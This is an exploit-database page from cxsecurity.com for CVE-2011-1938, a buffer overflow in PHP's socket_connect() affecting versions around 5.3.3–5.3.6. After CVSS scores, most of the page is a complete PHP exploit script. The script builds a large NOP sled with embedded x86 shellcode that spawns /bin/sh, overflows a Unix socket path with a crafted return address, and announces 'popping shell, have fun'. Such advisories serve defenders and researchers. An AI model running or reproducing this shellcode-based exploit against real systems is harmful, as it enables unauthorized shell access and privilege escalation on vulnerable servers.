PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

2011-05-31 / 2012-03-12
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php // Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian // Affected Versions: 5.3.3-5.3.6 echo "[+] CVE-2011-1938"; echo "[+] there we go...\n"; define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3"); define('EVIL_SPACE_SIZE', 1024*1024*8); $SHELLCODE = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0". "\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1". "\xcd\x80"; echo "[+] creating the sled.\n"; $CODE = str_repeat("\x90", EVIL_SPACE_SIZE); for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; $i < strlen($SHELLCODE) ; $i++, $j++) { $CODE[$j] = $SHELLCODE[$i]; } $b = str_repeat("A", 196).EVIL_SPACE_ADDR; $var79 = socket_create(AF_UNIX, SOCK_STREAM, 1); echo "[+] popping shell, have fun (if you picked the right address...)\n"; $var85 = socket_connect($var79,$b); ?>

References:

http://cxsecurity.com/issue/WLB-2011070112


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top